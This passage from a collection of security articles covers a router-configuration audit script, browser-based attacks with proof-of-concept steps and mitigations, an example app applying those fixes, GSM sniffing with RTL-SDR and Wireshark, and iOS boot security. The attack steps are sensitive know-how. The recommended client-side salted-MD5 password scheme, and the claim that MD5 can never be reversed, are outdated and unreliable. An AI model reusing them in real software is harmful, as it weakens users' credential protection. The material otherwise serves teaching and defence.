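    if cfg.security == "open":
        findings.append("OPEN: traffic is unencrypted and readable by any packet "
                        "capture; switch to WPA2 (AES)")
    elif cfg.security == "wep":
        findings.append("WEP: deprecated and broken by IV-collision attacks; "
                        "switch to WPA2 (AES)")
    elif cfg.security == "wpa2":
        findings.extend(passphrase_findings(cfg.passphrase, cfg.owner_phone))
    else:
        findings.append(f"UNKNOWN: unrecognised security mode {cfg.security!r}")
    if cfg.wps_enabled and not cfg.wps_lockout:
        # 4-digit half + 3-digit half, checked separately: at most 10,000 + 1,000 tries
        findings.append("WPS: PIN brute force needs at most 11,000 attempts; "
                        "enable a lockout policy or turn WPS off")
    if (cfg.admin_user, cfg.admin_pass) in DEFAULT_CREDS:
        findings.append("DEFAULT-CREDS: management panel still uses a factory "
                        "login; change it before anything else")
    return findings


def finding_codes(cfg: RouterConfig) -> List[str]:
    """Only the short codes, convenient for tests or a dashboard."""
    return [f.split(":", 1)[0] for f in audit_router(cfg)]


if __name__ == "__main__":
    weak = RouterConfig("wpa2", passphrase="sunshine", wps_enabled=True, admin_pass="admin")
    for line in audit_router(weak):
        print(line)
```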
19. Abstract

Web browsers or mobile browsers are software applications that act as the intermediary applications between a user and the World Wide Web and are used to access information from the Web. Some of the popular browsers which we are using in our daily life are Google Chrome, Mozilla Firefox, Internet Explorer, Opera, Safari, etc. With their wide usage and increasing popularity, they have become one of the major targets for exploitation by hackers. A small mistake during the coding of the application may result in it being vulnerable to intrusions. This article is going to cover a few browser-based attacks, which are not browser specific and can be exploited on any browser if not closed by the application developers during writing or designing the application. The following browser-based attacks, along with the mitigation, are going to be covered in this article:

Browser cache: Obtaining sensitive information from the cache stored in browsers.
Back and Refresh attack: Obtaining credentials and other sensitive data by using the Back button and Refresh feature of the browser.
Passwords in browser memory: Getting the password or credit card details stored in the browser’s physical memory.
Autocomplete: Obtaining the credentials of a user from the stored password in the browser.
Browser history: Sensitive information leaked through the URL from the browser’s history.

1. Browser Cache

Every time a website is opened, the contents of that web page are sent to the browser’s temporary cache folder on the user’s machine. If those contents of that web page need to load again, the browser opens the page from the cache instead of downloading the page again. If some web application stores and shows sensitive information to the user (such as their address, credit card details, username), this information could also be stored for caching, and hence it is retrievable through examining the browser’s cache. 
In IE, these pages are stored in C:\Users\<user_name>\AppData\Local\Microsoft\Windows\Temporary Internet Files
In Firefox, these pages are stored in C:\Users\<user_name>\AppData\Local\Mozilla\Firefox\Profiles\<profile-id>\Cache
Or by typing the following URL in the address bar of the browser: about:cache
In Chrome, these pages are stored in C:\Users\<user_name>\AppData\Local\Google\Chrome\User Data\Default\Cache
Or by typing the following URL in the address bar of the browser: chrome://cache

Proof of Concept

This demo is shown in the Mozilla Firefox browser. Log in to the application, access a few pages and then log out of the application. In the address bar, type about:cache. This shows the cache store in the browser. Go through the list and access the cache content of the website you are interested in. The following screenshot shows the URL for the user dashboard. The user dashboard can have sensitive information like address, phone number, mapped credit card details, e-mail ID, etc. On opening a specific cache entry, the user dashboard can be seen along with the address, phone number, order history, etc. This is shown in the following screenshot.

Mitigation

This problem can be mitigated by setting proper cache control attributes in the response header. Mainly there are two types of cache attributes:
1. Cache-control: no-cache
The no-cache attribute indicates that the browser should not use the information that is cached for that particular request–response pair. The browser stores the cache, but instead of showing the content from the cache, it sends the request to the server each time. But again, the cache will still be in the browser and can be easily accessed by an attacker or malicious user.
2. Cache-control: no-store
The no-store attribute indicates that the request–response pair should not be cached and stored in the browser. This applies to the entire page.
3. Using HTML meta tags
You can implement the cache control using Meta tags also.
Meta tags can be set as follows:
<meta http-equiv="Cache-Control" content="no-cache" />
<meta http-equiv="Cache-Control" content="no-store" />
Here, if the cache-control header is manually appended in the HTTP response and set to no-cache, as shown in the following screenshot, the browser will still cache the page. If the browser cache is accessed, the cached pages of a user’s dashboard can be found. Opening it in Offline mode will show the order details, as shown in the screenshot below. Now, if the value of a cache-control header is set to no-store, no-cache and the browser cache is accessed, the cached pages of a user’s dashboard will not be found. This is shown in the following screenshots. Hence, the developer should analyze the web page content and implement proper cache-control attributes on the pages storing sensitive data.

2. Password in browser memory

Most of the applications and servers store the password in hashed or encrypted format, but such hashing/encryption is not applied while storing passwords in the browser memory. The GET and POST requests on any sensitive page where the user is supplying sensitive information (like credentials, credit card number, etc.) are stored in the browser memory while it is open. An attacker with local access to the system can read the sensitive data using memory-reading tools like WinHex. An adversary with physical access to the user’s open browser, after logout, can thus steal the sensitive data from the memory. Once sensitive data like a password is discovered, attackers can escalate their privileges in the application.

Proof of Concept

Access the application. Enter the valid credentials, as shown in the following screenshot, and browse through the application. After logging out of the application, do not close the browser. Open any memory reading tool like “WinHex” and navigate to the following path, as shown in the screenshots below: Tools > Open RAM > Choose a browser (in this case Firefox) >
Select Entire Memory Search through the data using the username. The complete login request for that specific application can be obtained, as shown in the screenshot below. From here, an attacker can steal the login credentials of a user and escalate his privilege. Mitigation As this problem is present in the browser/local machine, using SSL will not mitigate this. A user can’t stop the browser from storing the password or other sensitive information. A solution has to be implemented through which the attacker can’t replay the password value obtained from the physical memory. So, the solution for this is to implement salted hashing. Instead of sending the password to the server, send the salted hash value of the password. Here is how the salted hashing technique works: Store the MD5 hash of the password in the database. (MD5 hash is a cryptographic technique in which the actual value can never be recovered). When a client requests for a login page, the server generates a random number called salt and sends it to the user along with the page. A JavaScript present on the client machine calculates the MD5 hash of the password entered by the user. It then combines the hash value with the salt value and recalculates the hash value. This hash value is sent to the server. The server picks the hash value of the password from its database, combines it with the salt value and calculates the MD5 hash value. If both the values match (it will happen only when the user enters the correct password), the user is authenticated to the application. Every time the salt value will be different; hence, even if the attacker gets the hashed password from the browser’s memory, he can’t replay it. Another solution could be implementing a JavaScript, which forcefully closes the browser once the user is logged out of the application. This will flush the complete memory of the browser, and hence no data can be retrieved from the browser’s memory. 3. 
Back and Refresh attack Browsers have the ability to maintain a recent record of pages that were visited by a user. The Back and Forward buttons on browsers use this functionality to display the pages recently browsed. In addition, browsers also keep track of variables like username, password, credit card details, etc. that were POSTed to the server while fetching the page. If a user logs in to the website, performs some actions and then logs out, and an adversary has access to the same machine as the user, he can see the logout page that is displayed on the browser window. He can then click the Back button until he reaches the page shown after a successful login. Here, the attacker can click the Refresh button, and the browser automatically resubmits the request with all the information. Proof of Concept Consider the Change Password page of an application: Log in to the application and access the Change Password page. Enter the values in the Current Password and New Password fields and click Submit. The request and response series for the Change Password request are shown in the following screenshots. Request Response The following screenshot shows that the password gets changed successfully. Browse through the application and then log out of the application. After logout, leave the machine without closing the browser window. An attacker who has physical access to this machine can simply click the Back button drop-down list and identify the page which comes after the Change Password page. This is depicted in the following screenshot. When a specific page is clicked, the browser displays the warning that the page has expired, as shown in the following screenshot. At this point the attacker can start a browser proxy tool like Burp and configure the browser to send its requests through the proxy. On the error page, the adversary clicks the Refresh button. 
The browser shows a pop-up warning to the user about reposting some of the variables in order to access the page, as shown in the screenshot below. The attacker clicks the “Resend” button. The attacker can see the request going to server using the configured proxy tool and can steal the password value of the user. This is shown in the screenshot below. Variation of the attack Many times it has been observed that the site is using redirection on successful login but not on unsuccessful login. If a login page is secured by CAPTCHA and the user provides the correct credentials but the wrong CAPTCHA value, then the user is again served with the login page with an error message. In this case too, an attacker can steal the credentials using the Back and Refresh features. Even if CAPTCHA is not implemented, an attacker can get some sensitive information like correct username or password. Proof of Concept Access the login page of the application and provide the correct username and wrong password, as shown in the following screenshot. After validating the credentials, the server responds with a “200 OK” with error stating “Username/Password is wrong”. This is shown in the screenshots below. Click the Back button and access the page which came after providing the incorrect credentials, as shown in the following screenshot. The browser warns that the document has expired and asks the user to resend the data to the server, as shown in the following screenshot. Configure the proxy between the browser and server and intercept the data going to the server. Click the “Resend” button. The user credentials can be seen in cleartext in the captured request, as shown in the following screenshot. Cause of problem The browser keeps track of the requests sent to server to fetch particular pages. In this case, the Change Password page is “changepass.aspx” and the page which appears after is “changepass1.aspx”. 
The “changepass1.aspx” page is displayed after providing the Current, New and Confirm Password values. So, the browser remembers the request which is sent to get the “changepass1.aspx” page. The following steps are present for the existing scenario: The user accesses the “changepass.aspx” page. The user types the current password, new password, and confirm new password and submits the request which is sent to “changepass1.aspx”. The user is authenticated in the “changepass1.aspx” page. The user is served with the “changepass1.aspx” page. When the attacker clicks the “changepass1.aspx” page, the request which was sent to render “changepass1.aspx” is resent to the server. This request contains the current, new and confirm new password values. Mitigation The following steps will be performed if an intermediate page is implemented between “changepass.aspx” and “changepass1.aspx”: The user accesses the “ChangePass.aspx” page. The user types the current password, new password, and confirm new password and submits the request to “CheckPass.aspx” The user is authenticated in the “CheckPass.aspx” page. The user is redirected to the “ChangePass1.aspx” page. The browser sends a new request to fetch the “ChangePass1.aspx” page. Now, even if an attacker refreshes the “changepass1.aspx” page, the request which the browser used to get “changepass1.aspx” will be sent, which is a redirect request sent by “CheckPass.aspx”. The request will be a simple GET request for fetching “ChangePass1.aspx” and there will be no value going in that request. The solution should be implemented on all the pages where a form is being submitted or some sensitive action is happening. 4. Autocomplete In many applications, when the user submits credentials, the browser shows a pop-up for remembering the password. If the user clicks “Remember password”, the browser will store the password and automatically enter it when the same application is accessed again. 
The feature is convenient for users, as they don’t have to remember and enter the password, but it poses a problem if the user is using this feature on a shared or public computer. An attacker can easily retrieve the stored password from the browser. Even if the stored passwords are encrypted or protected by the master password (a password to access the stored passwords), an attacker can retrieve this password by visiting the application, for which the password is stored, in the browser. An attacker enters the username and the browser automatically fills the password field. An attacker can run a proxy tool like Burp to intercept the request going to the server and then can obtain the cleartext or encrypted password going to the server. The saved password can be accessed by navigating to:
Firefox: Options > Security > Saved Passwords
Chrome: Settings > Manage passwords (under Passwords and forms)
IE: Internet Options > Content > AutoComplete Settings > Manage Passwords

Proof of Concept

Here, after entering the credentials, the browser shows a popup asking the user if the password for the website should be remembered. This is depicted in the screenshot below. If the user clicks “Remember Me”, the password will be stored in the browser. In Firefox, the saved password can be accessed by navigating to Tools > Options > Security > Saved Passwords. This is depicted in the following screenshot. When the “Saved Passwords” button is clicked, the browser shows the list of websites for which the passwords are stored in the browser. This is shown in the following screenshot. If the “Show Passwords” button is clicked, the user will be able to see the stored passwords, as shown in the screenshot below. Now, suppose the list of stored passwords is secured by a master password in the browser. Then the user has to enter the master password to access the list, as shown in the screenshot below.
In this case, an adversary needs to use an intermediate proxy tool to intercept the request going to the server. Go to the application and double click the username field. It will show the list of the stored usernames. Click one username and the browser will automatically fill the password from the stored password list. This password can’t be seen, as it is hidden behind the asterisk symbols. A user can click the Submit button and capture the request going to the server using a web proxy tool like Burp. From the intercepted request, it is easy to find the password of the submitted username, as the data can be seen in cleartext. This is shown in the following screenshot.

Mitigation

The problem can be solved by setting the Autocomplete attribute in the Login and other sensitive pages. Make sure the Autocomplete attribute for all sensitive pages is set to “off”. A sensitive page can be the Login page, change password page, edit information page, etc. If Autocomplete is not configured on the page, then by default it is “ON” and the application will store the information. This can be done using the following markup:
<form autocomplete="off"> – It will set Autocomplete to “OFF” for all form fields in the page.
Even if the browser is configured to store the password, the above code will override the browser settings. The Autocomplete attribute is ignored in the latest versions of all browsers. Hence, the above solution won’t work for the latest versions of the browsers. As a security best practice, a user should be warned with a generic warning message about storing the cleartext password in the browser. A more advanced way of implementation, involving HTML and JavaScript, can be used. A sample code is available here.

5. Browser history

When a user submits any data, it goes to the server either in a GET request or in a POST request. In a GET request the user data is present in the URL itself, whereas in a POST request the user data is present in the body of the request.
The following two screenshots show user data going in GET and POST requests. All GET requests that are accessed from the browser are stored in the browser’s history and cache. This data can be viewed even if the user is logged out or the browser is closed by checking the history of the browser. So, if an application sends the user’s sensitive information through a GET request, i.e. through the URL, an attacker can obtain this data by checking the browser history.
GET request:
POST request:

Proof of Concept

Here, after entering the credentials on the website when the user clicks the LOG IN button, the credentials are sent in a GET request. This is shown in the following screenshot. The request going to the server is captured in Burp, which shows that the user provided data is sent as a GET request. This is depicted in the following screenshot. So, an attacker who has physical access to the user’s machine can see these credentials in the browser’s history, as shown in the screenshot below. In the same way, if an application sends other sensitive data like credit card details through the GET request, the data can be accessed from the browser history.

Mitigation

Never send sensitive information in the GET request. Data containing sensitive information should be sent through the POST request. When sensitive information is sent in the POST request, the data goes in the request body, and hence can’t be accessed from the browser history, because the browser history only shows the GET requests. Implement the POST method in the form as shown below:
<form name="login" action="index_submit" method="POST" accept-charset="utf-8">
The above screenshots show that no sensitive data is being stored in the browser history when the application is using POST instead of the GET method.

Conclusion

So, we have now discussed some browser-based attacks in this article. These attacks are applicable on web as well as mobile browsers.
To perform any of the above attacks, an attacker has to depend on the following points: The attacker should have physical access to the victim’s machine. For some attacks, the browser should not be closed. The victim should not delete the browsing history, cache, etc. Due to all these limitations, the risk rating for all the above mentioned attacks ranges from Medium to Low, but depending on the information received, it can be high too. If an attacker can get account/credit/debit card details in the browser’s cache or through the Back and Refresh attack, then the risk rating would be high. All these vulnerabilities can be avoided by implementing the proper controls discussed in this article. References https://devcenter.heroku.com/articles/increasing-application-performance-with-http-cache-headers https://www.owasp.org/index.php/Testing_for_Vulnerable_Remember_Password_(OTG-AUTHN-005) http://repo.hackerzvoice.net/depot_cehv6/CEHv6%20Module%2059%20How%20to%20Steal%20Passwords/Stealing_passwords_via_browsers.pdf Source
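The server-side fixes that the post above spreads over sections 1, 3, 4 and 5 (no-store caching headers, the intermediate page that turns a form submission into a redirect, autocomplete="off", and POST instead of GET) fit together in one small application. The following is an added example, not code from the original article: a WSGI app whose route names (/changepass, /checkpass, /changepass-done) are invented here, and which leaves out the actual check of the current password against storage.

```python
# Added example, not code from the original article. A small WSGI application
# that applies the server-side mitigations discussed above in one place:
#   section 1: Cache-Control: no-store on every page that shows or accepts
#              sensitive data (no-cache alone still leaves a copy on disk)
#   section 3: Post/Redirect/Get on the change-password form, so the page the
#              browser lands on after submission was fetched with a bare GET and
#              a later Refresh on it replays no password fields
#   section 4: autocomplete="off" on the form and its password inputs
#   section 5: method="POST", so credentials never appear in the URL or history
# The route names /changepass, /checkpass and /changepass-done are invented for
# this example; checking the current password against storage is left out.
from urllib.parse import parse_qs

NO_STORE = [
    ("Cache-Control", "no-store, no-cache, must-revalidate"),
    ("Pragma", "no-cache"),  # honoured by older HTTP/1.0-style caches
    ("Expires", "0"),
]

FORM = """<form method="POST" action="/checkpass" autocomplete="off">
  <input type="password" name="current" autocomplete="off">
  <input type="password" name="new" autocomplete="off">
  <input type="password" name="confirm" autocomplete="off">
  <button type="submit">Change password</button>
</form>"""


def handle(method, path, body=b""):
    """Route one request and return (status, headers, body).
    Pure function, so the behaviour can be checked without a socket."""
    html = [("Content-Type", "text/html; charset=utf-8")] + NO_STORE
    if method == "GET" and path == "/changepass":
        return "200 OK", html, FORM
    if method == "POST" and path == "/checkpass":
        fields = {k: v[0] for k, v in parse_qs(body.decode()).items()}
        ok = (fields.get("current") and fields.get("new")
              and fields.get("new") == fields.get("confirm"))
        if not ok:
            # Back to the form with only a flag in the URL, never the passwords.
            return "303 See Other", [("Location", "/changepass?err=1")] + NO_STORE, ""
        # ... verify fields["current"] and store the new password here ...
        # 303 makes the browser fetch the result page with a fresh GET, so the
        # request it remembers for /changepass-done carries no form data.
        return "303 See Other", [("Location", "/changepass-done")] + NO_STORE, ""
    if method == "GET" and path == "/changepass-done":
        return "200 OK", html, "<p>Password changed.</p>"
    return "404 Not Found", html, "not found"


def app(environ, start_response):
    """WSGI adapter around handle()."""
    length = int(environ.get("CONTENT_LENGTH") or 0)
    body = environ["wsgi.input"].read(length) if length else b""
    status, headers, text = handle(environ["REQUEST_METHOD"], environ["PATH_INFO"], body)
    payload = text.encode()
    start_response(status, headers + [("Content-Length", str(len(payload)))])
    return [payload]


if __name__ == "__main__":
    from wsgiref.simple_server import make_server
    with make_server("127.0.0.1", 8000, app) as server:
        print("Serving http://127.0.0.1:8000/changepass")
        server.serve_forever()
```

Run it, change the password through the form, then press Back and Refresh in the browser: the page the history holds for /changepass-done was obtained with a plain GET, so there is nothing for the browser to offer to "Resend". The no-store headers go on the redirect responses as well, since they are also part of the request chain a browser may keep.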
  20. Introduction The Global System for Mobile Communication or GSM is a wireless communication that uses digital technology and is widely deployed across the globe for mobile communications, such as mobile phones. This technology utilizes microwaves, and its signal transmission is divided by time, mostly known as Time Division Multiple Access (TDMA). In this article, I will be discussing the method that could be used to see the traffic on a GSM network and how an attacker could abuse the GSM network. Mobile communication technology was already developed and widely used in the early 1980s. For the first time, the C-NET system was developed in Germany and Portugal by Siemens, the RC-2000 system was developed in France, and the NMT system was developed in the Netherlands and Scandinavia by Ericsson, as well as the TACS system which operates in the UK. GSM appeared in mid-1991 and eventually turned into mobile telecommunications standard for the whole of Europe, maintained by the ETSI (European Telecommunications Standards Institute) technical committee. GSM started its commercial operation at the beginning of the last quarter of 1992 because GSM is a complex technology and needed more assessment to be used as standard protocol. In September 1992, type approval standards for mobile agreed to consider and incorporate dozens of test items for GSM production. In Europe, GSM was originally designed to operate at the frequency of 900 MHz. In this frequency, the uplinks use frequencies between 890 MHz to 915 MHz, and frequency between 935 MHz to 960 MHz is used for downlinks. The bandwidth used is 25 MHz ((915 – 890) = (960 – 935) = 25 MHz), with a channel width of 200 kHz. GSM Network Architecture Typical GSM network architecture is divided into 3 parts: Mobile Station (MS) Base Station Sub-system (BSS) Network Sub-system (NSS) And all elements of the network at the top form a PLMN (Public Land Mobile Network). Picture 1. GSM network architecture. 
Mobile Station or MS is a device used by the customer for making phone calls. This device consists of: Mobile Equipment (ME) or the handset (UM) is a GSM device that is located on the user’s or customer’s end that serves as a terminal transceiver (transmitter and receiver) to communicate with other GSM devices. Subscriber Identity Module (SIM) or SIM card is a card that contains all customer information and some information about services. ME can’t be used without SIM in it, except for emergency calls. The data stored in the SIM in general are: International Mobile Subscriber Identity (IMSI). Mobile Subscriber ISDN (MSISDN). Encryption mechanism. Base Station System or BSS consists of: Base Transceiver Station (BTS) is a GSM device that is directly related to MS and serves as the sender and receiver. Base Station Controller (BSC) is a controller device for base stations located between the BTS and MSC. Network Sub System or NSS consists of: Mobile Switching Center (MSC) is a central network element in a GSM network. MSC works as the core of a cellular network, where the MSC’s main role is interconnection, both among the cellular or wired network PSTN or with the data network. Home Location Register (HLR) is a database that saves the data and customer information permanently. Visitor Location Register (VLR) is a database of the subscribers who have roamed into the jurisdiction of the Mobile Switching Center (MSC) which it serves. Authentication Center (AuC) authenticates each SIM card that attempts to connect to the GSM core network (typically when the phone is powered on). This also checks the validity of the customer. Equipment Identity Register (EIR) is often integrated into the HLR. The EIR keeps a list of mobile phones (identified by their IMEI) to be banned from the network or monitored. This is designed to allow tracking of stolen mobile phones. GSM Layer There are 3 layers in the GSM network: Layer 1 or the physical layer, for setting the channels.
Layer 2 or the data-link layer, whose main role is to identify the data that is sent from UM to BTS. Layer 3 consists of 3 parts: Radio Resource (RR), Mobility Management (MM) and Call Control (CC) that serve as a regulator for radio, mobile management and call control. Illustration of How GSM Works Picture 2. Illustration of how GSM works. The mobile phone is given the destination number and connects to the nearest BTS. BSC and BTS send to MSC to continue and proceed to the AuC for checking the user identification. MSC proceeds to the HLR / VLR to check the existence of the mobile phone. BSC and MSC proceed to the nearest BTS where the destination mobile is located. Problem The background of this issue lies in the GSM network. Due to the leaking of the encryption design in 1994, it could be attacked, such as sniffing the voice in an established communication. Attacking 1. Packet Analysis At this stage, the attacker will do packet analysis on one of the GSM providers (for this example, the attacker will attack one of the service providers in Indonesia). The attacker is using multiple devices for packet analysis (Openmoko and Nokia 3310) and using Wireshark to dissect information used in GSM networks such as: Encryption used by the provider. ARFCN number. Location of the mobile phone, etc. The first step is that the attacker will analyze encryption used by the provider: Picture 3. A5/1 encryption used by the provider. In the picture above, the encryption used by the provider is A5/1. In the second packet, we could see the location in ARFCN, because ARFCN is the determinant of the uplink and downlink signal to a GSM network. Picture 4. ARFCN (downlink) in use. From the above picture, we could see that the provider uses ARFCN 881.
For more details, the frequency for ARFCN 881 is as follows: ARFCN: 881 Downlink frequency: 1879000000 Hz Uplink frequency: 1784000000 Hz Distance: 95000000 Hz Offset: 512 Band: GSM1800 (DCS 1800) It could be assumed that the provider uses encryption A5/1 and 1879000000 Hz frequency for downlink and 1784000000 Hz for uplink. However, ARFCN is not static in a communication. Picture 5. ARFCN calculation (GSM 1800) Picture 6. GSM900 frequency allocation in Indonesia. Picture 7. GSM1800 frequency allocation in Indonesia. 2. Authentication of a Communication When MS communicates to a BTS, MS identifies itself using IMSI and IMEI, and BSC to MSC communication responds to the IMSI. The authentication function is to assure that MS is a legitimate user. An illustration can be seen in the image below: Picture 8. MS Authentication flow. An explanation for the above picture is as follows: MS sends IMSI and IMEI to BSC. BSC requests IMSI and IMEI to MSC. MSC responds and sends RAND, SRES and Ki. BSC sends RAND to MS. MS responds with SRES’. BSC checks SRES’. 3. Kc Generation On A5/1 Picture 9. Kc generation on A5/1. The picture above shows the process of Kc generation before being used to send and receive a communication. RAND is a random number generated by the AuC when a customer makes an authentication request to the network. RAND is used to generate SRES and Kc. Ki is the authentication key paired with the IMSI when a SIM card is made. Ki only exists on the SIM card and the Authentication Center (AuC). Ki never gets transmitted over the GSM network. A8 is the algorithm that is used to calculate Kc. Ki and RAND are inserted into the A8 algorithm and the result is Kc. The A8 algorithm exists on the SIM card and the AuC. Kc is the key used in the A5 encryption algorithm to encrypt and decipher data that is being sent when communication occurs. 2. Sniffing GSM In Realtime In order to be able to sniff a GSM packet, you must have hardware that works as a receiver.
For example, the RTL-SDR with the rtl2832 chip. However, this hardware has a limitation. The maximum packet capture is 16 kHz wide. In other words, not all GSM packets can be captured using this hardware. Picture 10. Sample packet captured with rtl2832 DVB (max 16 kHz). GSM uses 200 kHz for communication and it is divided into 8 slots (200 kHz / 8 = 25 kHz / slot). Picture 11. Downlink and uplink frame illustration. Before we can start capturing GSM packets, first we must know the ARFCN in use. One method that could be used to find out the ARFCN is by using Blackberry Engineering Mode. In order to use that feature, you can simply search for “blackberry engineering mode calculator“. After entering the engineering mode, you can see the ARFCN currently in use as you may see in this picture: Picture 12. Blackberry engineering mode (ARFCN 114). After knowing the ARFCN, we can proceed to capture the downlink packets. The capturing process can be seen in this picture (the result is not optimal due to a standard antenna being used): Picture 13. Sample captured with DVB (only to see the downlink frequency). From the above picture, we can see that the signal is not strong enough and it could increase the packets lost during the capture period. Here’s an example of captured GSM packets using RTL-SDR and analyzed using Wireshark: Picture 14. Sample GSM packet captured using RTL-SDR and analyzed using Wireshark. Conclusion From the above explanation, we can conclude that communication through GSM exposes some security concerns. An attacker who understands how the GSM protocol works and has complete GSM standard documentation could find a way to attack GSM networks, especially if security is poorly implemented. Source
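The ARFCN figures the post quotes for ARFCN 881 (1784.0 MHz uplink, 1879.0 MHz downlink, 95 MHz spacing, offset 512) and for ARFCN 114 are instances of the standard channel-numbering arithmetic, which is what you need in the other direction too: turning a carrier seen on an SDR waterfall back into an ARFCN before tuning a capture. The following is an added example, not code from the original article; it generalises the single DCS 1800 case above to the P-GSM 900, E-GSM 900 and PCS 1900 bands using the 3GPP TS 45.005 constants.

```python
# Added example, not part of the original article: the ARFCN <-> carrier
# frequency arithmetic behind Pictures 5 to 7, generalised from the single
# DCS 1800 case quoted above (ARFCN 881 -> 1784.0 MHz uplink, 1879.0 MHz
# downlink) to the other common GSM bands. Constants follow the 3GPP TS 45.005
# channel numbering; everything is kept in integer kHz to avoid float error.

CHANNEL_KHZ = 200  # GSM carrier raster

# band: (first ARFCN, last ARFCN, uplink base in kHz, ARFCN offset, duplex spacing in kHz)
#   uplink = base + 200 kHz * (ARFCN - offset);  downlink = uplink + duplex spacing
BANDS = {
    "P-GSM 900": (0,   124,  890_000,   0,    45_000),
    "E-GSM 900": (975, 1023, 890_000,   1024, 45_000),  # extension band below 890 MHz
    "DCS 1800":  (512, 885,  1_710_200, 512,  95_000),
    "PCS 1900":  (512, 810,  1_850_200, 512,  80_000),  # reuses the DCS numbers
}


def arfcn_to_freq(arfcn, band=None):
    """Return (uplink_hz, downlink_hz, band) for an ARFCN.
    ARFCNs 512-810 exist in both DCS 1800 and PCS 1900, so the band must be
    named for those; everywhere else it is inferred from the number alone."""
    candidates = [b for b, (lo, hi, *_) in BANDS.items() if lo <= arfcn <= hi]
    if band is not None:
        if band not in candidates:
            raise ValueError(f"ARFCN {arfcn} is not allocated in {band}")
        candidates = [band]
    if not candidates:
        raise ValueError(f"ARFCN {arfcn} is not in a known band")
    if len(candidates) > 1:
        raise ValueError(f"ARFCN {arfcn} is ambiguous, name one of {candidates}")
    name = candidates[0]
    _, _, base_khz, offset, duplex_khz = BANDS[name]
    up_khz = base_khz + CHANNEL_KHZ * (arfcn - offset)
    return up_khz * 1_000, (up_khz + duplex_khz) * 1_000, name


def freq_to_arfcn(hz):
    """Inverse lookup for a carrier spotted in an SDR waterfall: every
    (arfcn, band, direction) whose channel centre is exactly hz. More than one
    hit is possible, since band plans overlap; the region decides which applies."""
    hits = []
    khz = hz // 1_000
    for name, (lo, hi, base_khz, offset, duplex_khz) in BANDS.items():
        for direction, centre0 in (("uplink", base_khz), ("downlink", base_khz + duplex_khz)):
            delta = khz - centre0
            if delta % CHANNEL_KHZ:
                continue
            n = offset + delta // CHANNEL_KHZ
            if lo <= n <= hi:
                hits.append((n, name, direction))
    return hits


if __name__ == "__main__":
    for n in (881, 114):  # the two ARFCNs that appear in the article's captures
        up, down, band = arfcn_to_freq(n)
        print(f"ARFCN {n:4d} {band}: uplink {up / 1e6:.1f} MHz, downlink {down / 1e6:.1f} MHz")
    print(freq_to_arfcn(1_879_000_000))
```

Note the second hit that freq_to_arfcn reports for 1879.0 MHz: the same centre frequency is ARFCN 881 downlink in DCS 1800 and ARFCN 656 uplink in PCS 1900. The number on the screen is not enough on its own; the country's band plan (Pictures 6 and 7 for Indonesia) is what resolves it.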
21. Apple uses iOS (operating system) to power many of its mobile devices such as iPhone, iPad and so on. From the beginning, security has been placed at the core of iOS. There are many inherent features that secure the device and its resources at different levels. This article aims to provide answers to questions such as the following: What really happens when an iPhone is powered on? How is data at rest secured by iOS? If the device is lost or stolen, can the attacker view or modify my personal data? How are privacy controls enforced? For ease of understanding, we will deal with each of these topics in separate sections. Let’s begin! Boot level security mechanism In the desktop computer world, an attacker can access the data present on the hard disk even without knowledge of the password of that system. For instance, he can remove the hard disk and plug it into a different system and read the data, or he can boot the system into a different OS by using a live CD. But do you think it’s possible in the case of an iPhone? I.e., can an attacker who has access to an iPhone remove the chip and read its data or sideload another OS to access data? Not really under normal circumstances! This is because iOS devices don’t load firmware that is not signed by Apple. Taking a look at the boot level security mechanism would help us to understand this in a better fashion. So what really happens when you power on your iPhone? When an iOS device is turned on, the processor immediately executes code known as the boot ROM. This boot ROM code is something that is designed during chip fabrication and is implicitly trusted. This boot ROM also contains root certificates of Apple which will be used to signature check the loading of the next stages. LLB (Low Level Boot loader) is the next thing that will be loaded after the signature check. LLB finishes its task and loads the next stage boot loader iBoot after verifying its signature. iBoot verifies and runs the iOS kernel.
Thus, as shown in the following figure, at each stage a signature check is done before loading the next step. This is called “Chain of Trust”. Hence, under normal circumstances, this chain of trust ensures iOS runs on valid devices only and also verifies that the phone is not booted into another operating system. Can this signature check be bypassed so that we can flash our own boot loader? Yes it can be. Several vulnerabilities have been identified in boot ROM code which can be exploited to not only flash our own boot loader but also to bypass the signature checks of every stage. Remember that if one link is compromised, it would ultimately lead to compromise of all the other links that follow. How this can be done will be discussed in a separate post. Secure Enclave You must have heard about the fingerprint sensor introduced in iPhone 5S. Apple says this fingerprint information is encrypted and stored in a ‘Secure Enclave’ inside the phone and is never backed up to iCloud or any Apple servers. So what is this Secure Enclave and how does it work? Secure Enclave is a coprocessor created inside the Apple A7 processor. All the cryptographic operations required for data protection are handled by this. It has a secure boot and updates which are separate from the main processor. Secure Enclave is a concept that is similar to ARM’s TrustZone technology. Following is a sample depiction of the hardware architecture of trust zones. As shown above, a new mode called ‘secure mode’ is added to the processor. In simple terms, it kind of creates a two-world architecture on the same device. The first world that runs normal iOS apps (user mode) and the second world that runs only trusted code (secure mode). Data written to the RAM when in secure monitor mode cannot be accessed when in user mode.
The following steps compiled from iPhone5S: Inside the Secure Enclave | Fortinet Blog explain how Secure Enclave works while validating the fingerprint in iPhone 5S: User enters his fingerprint Locking service calls an API present in secure world Processor switches to secure world The bits which characterize the fingerprint move from sensor to processor This data cannot be eavesdropped or modified by any app because this process is running in secure mode which is different from user mode Necessary cryptographic verifications are done & access granted. Apple thus argues that even if the kernel is compromised, the integrity of data protection will be maintained. As per Apple’s documentation, “Each Secure Enclave is provisioned during fabrication with its own UID (Unique ID) that is not accessible to other parts of the system and is not known to Apple. When the device starts up, an ephemeral key is created, entangled with its UID, and used to encrypt the Secure Enclave’s portion of the device’s memory space”. Code Signing Apps have today become critical components of any mobile operating system. Apple believes enforcing strict security at the application level is important to ensure overall security of the device. Apple has gone to great extent to make this happen, and code signing is one step in that direction. To put it simply, Apple does not allow running any app which is not approved by it! To ensure that all apps are from a trusted and approved source and have not been tampered with, iOS requires all apps to be signed by Apple. Default apps like Safari are signed by Apple. Other third party apps are also to be verified and signed by Apple. In other words, the above discussed chain of trust principle continues from boot loader to OS to apps. But how does this actually work? Does this mean I cannot run an app developed by me if it’s not signed by Apple? 
